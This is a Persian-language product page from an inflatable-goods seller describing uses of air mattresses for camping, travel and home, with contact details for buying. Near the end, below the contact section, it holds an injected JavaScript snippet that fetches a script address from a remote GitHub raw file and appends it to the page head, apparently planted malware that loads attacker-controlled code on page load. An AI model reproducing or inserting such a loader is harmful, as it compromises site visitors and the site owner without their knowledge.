انواع کاربرد تشک های بادی

  • کاربرد تشک های بادی ؟ تشک های بادی محصولاتی هستند که بیشتر حجم آنها را باد تشکیل داده و در ابعاد و طرح های مختلف تولید شده اند. این تشک ها از نظر شکل ظاهری بسیار شبیه تشک های معمولی هستند و به شکل مستطیلی می باشند. این تشک ها دارای وزن و حجم کمی هستند و به راحتی قابل جا به جایی و نصب و جمع آوری می شوند. این تشک ها در زمینه های مختلف کاربرد دارند، مانند:

    کاربرد تشک های بادی در ورزش و تفریح: این تشک ها می توانند برای کمپینگ، طبیعت گردی، سفر، استخر، سواحل و سایر مکان های مشابه استفاده شوند. برخی از این تشک ها به شکل صندلی عقب ماشین طراحی شده اند و می توانند در داخل خودرو نصب شوند و فضای راحتی برای خوابیدن و استراحت فراهم کنند. برخی از این تشک ها همراه با پمپ بادی برقی یا دستی عرضه می شوند که کار را برای شما آسان تر می کنند.

    زندگی روز مره: این تشک ها می توانند برای خوابیدن در منزل، ویلا، خانه باغ، مهمانی و سایر موارد مورد نیاز شما به کار روند. برخی از این تشک ها دارای الیاف طبی و روکش های مخمل، جیر و کامفورت هستند که راحتی و سلامتی شما را تضمین می کنند. برخی از این تشک ها همراه با بالش و پتو عرضه می شوند که برای فصول سرد مناسب هستند.

    سبک و قابل حمل هستند: شما می توانید تشک های بادی را به راحتی در کیف یا جعبه خود جا دهید و با خود ببرید. این تشک ها وقتی بادشان خالی شود، فضای کمی را اشغال می کنند و وزن کمی دارند12.
    راحت و انعطاف پذیر هستند: شما می توانید با تغییر میزان باد تشک، سختی یا نرمی آن را تنظیم کنید تا به سطح راحتی مورد نظر خود برسید12. همچنین، تشک های بادی شما را از سرمای زمین جدا می کنند و از از دست دادن حرارت بدن در شب های سرد جلوگیری می کنند.

    نحوه خرید تشک های بادی

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید تشک های بادی می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید